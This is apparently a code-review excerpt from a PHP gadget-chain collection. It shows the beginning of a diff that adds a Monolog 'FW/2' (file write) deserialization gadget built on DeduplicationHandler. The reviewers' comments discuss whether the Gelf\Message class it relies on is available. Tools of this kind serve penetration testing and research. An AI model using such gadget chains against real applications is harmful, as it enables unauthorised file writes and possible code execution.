gadgetchains/Monolog/FW/2/gadgets.php

```diff
@@ -0,0 +1,41 @@
+<?php
+
+namespace Monolog\Handler
+{
+    class DeduplicationHandler
+    {
+        protected $bufferSize = 1;
+        protected $buffer;
+        protected $deduplicationLeve=0;
+        protected $deduplicationStore;
+        protected $time=0;
+        
+        public function __construct($path, $data)
+        {
+            $this->buffer = [["level"=>1,"message"=>$data,'datetime'=>new \Gelf\Message(),'level_name'=>'']];
```

Comment:
Gelf\Message is not present.

Reply:
again by `composer create-project monolog/monolog=2.0.0 monolog`, in fact, a class that has the `getTimestamp` method will be ok

Reply:
Same: by default, `create-projecŧ` seems to include `dev` dependencies, while `install` does NOT.
We have generally refrained from including `dev` dependencies to GCs, as they are not often included.